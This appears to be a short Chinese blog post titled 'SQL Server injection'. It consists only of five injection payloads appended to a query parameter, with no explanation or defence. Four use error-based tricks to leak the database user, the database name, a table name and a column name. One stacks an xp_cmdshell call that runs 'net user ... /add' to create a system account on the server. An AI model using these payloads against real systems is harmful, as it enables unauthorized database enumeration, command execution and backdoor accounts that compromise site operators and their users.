`
hudeyong926
  • 浏览: 2018775 次
  • 来自: 武汉
社区版块
存档分类
最新评论

sql server注入

阅读更多

select *from aScapeInfo  where scape_id =20 and user>0
select *from aScapeInfo  where scape_id =20 and db_name()>0
select *from aScapeInfo  where scape_id =20 and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
select *from aScapeInfo  where scape_id =20;exec master..xp_cmdshell "net user name password /add"--
select *from aScapeInfo  where scape_id =20 and (Select Top 1 col_name(object_id('Users'),1) from sysobjects)>0

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics